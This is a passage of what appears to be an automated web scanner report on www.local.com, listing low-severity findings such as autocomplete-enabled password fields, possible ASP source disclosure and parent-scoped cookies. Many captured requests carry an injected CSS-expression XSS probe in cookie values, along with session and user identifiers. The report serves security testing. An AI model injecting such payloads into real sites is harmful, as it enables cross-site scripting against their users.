The form contains the following password field with autocomplete enabled:

password

Request

Response

5.14. http://www.local.com/business/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/results/?keyword=restaurants&location=dallas%2c+tx

The form contains the following password field with autocomplete enabled:

password

Request

GET /business/results/?keyword=restaurants&location=dallas%2c+tx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.15. http://www.local.com/business/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/business/results/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.16. http://www.local.com/contact.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/contact.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.17. http://www.local.com/coupons/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/coupons/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.18. http://www.local.com/coupons/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/coupons/?location=Dallas%2c+TX

The form contains the following password field with autocomplete enabled:

password

Request

GET /coupons/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.19. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/coupons/printable/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.20. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/dialogs/register.aspx

The form contains the following password fields with autocomplete enabled:

defaultPageTemplate$password
defaultPageTemplate$password2
defaultPageTemplate$haveActPassword

Request

Response

5.21. http://www.local.com/events/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/events/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.22. http://www.local.com/events/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/events/?location=Dallas%2c+TX

The form contains the following password field with autocomplete enabled:

password

Request

GET /events/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.23. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/events/category/music/dallas-tx.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.24. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/events/category/performing-arts/dallas-tx.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.25. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/events/category/sports/dallas-tx.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.26. http://www.local.com/faq.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/faq.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.27. http://www.local.com/privacy/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/privacy/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.28. http://www.local.com/results.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.29. http://www.local.com/results.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/results.aspx

The form contains the following password field with autocomplete enabled:

password

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.30. http://www.local.com/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/results/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.31. http://www.local.com/results/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/results/?keyword=american+restaurants&location=dallas%2c+tx

The form contains the following password field with autocomplete enabled:

password

Request

GET /results/?keyword=american+restaurants&location=dallas%2c+tx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.32. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/sitemap.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.33. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/sitemap/chicago-il.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.34. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/sitemap/los-angeles-ca.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.35. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL:

http://www.local.com/sitemap/new-york-ny.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.36. http://www.local.com/terms/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/terms/

The form contains the following password field with autocomplete enabled:

password

Request

Response

5.37. http://www.local.com/topics/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/topics/

The form contains the following password field with autocomplete enabled:

password

Request

GET /topics/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

5.38. http://www.local.com/topics/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The page contains a form with the following action URL:

http://www.local.com/topics/?topic=food&keyword=food

The form contains the following password field with autocomplete enabled:

password

Request

Response

6. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.local.com
Path:	/business/v3/js/globalbusiness_3_5.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4034_19829 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26246
Expires: Thu, 03 Feb 2011 23:17:16 GMT
Date: Thu, 03 Feb 2011 15:59:50 GMT
Connection: close
Content-Length: 477751

ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
om.Toggle("listOptions","none");$_dom.Check("selAll");},OnLoad:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn OnLoad');that.AddListeners();that.PrepareMailLinks();var CSk='<%#CloudSpongeConfig.Current.ApiKey %>';var CSp='<%#CloudSpongeConfig.Current.ApiSecret %>';setKeys(CSk,CSp);},PrepareMailLinks:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn PrepareMailLinks');var mails=new Array("gmail","yahoo","msn","aol");for(var i=0;i<mails
...[SNIP]...

7. Cookie scoped to parent domain previous next
There are 43 instances of this issue:

/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/contact.aspx
/coupons/
/coupons/printable/
/details/photos/dallas-tx/amegy-bank-97648000/
/details/photos/dallas-tx/cet-products-liquidators-9985416/
/details/photos/dallas-tx/equity-bank-63975058/
/details/photos/dallas-tx/hillcrest-bank-104826937/
/details/photos/dallas-tx/sterling-bank-16856575/
/dialogs/account/acctreg.aspx
/dialogs/network.aspx
/dialogs/register.aspx
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/
/ver1.0/Direct/JavascriptSDKProxy
/ver1.0/Direct/Jsonp
/ver1.0/Photo/Upload
/ver1.0/ReviewPage.app
/ver1.0/Video/Upload

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

7.1. http://www.local.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.2. http://www.local.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

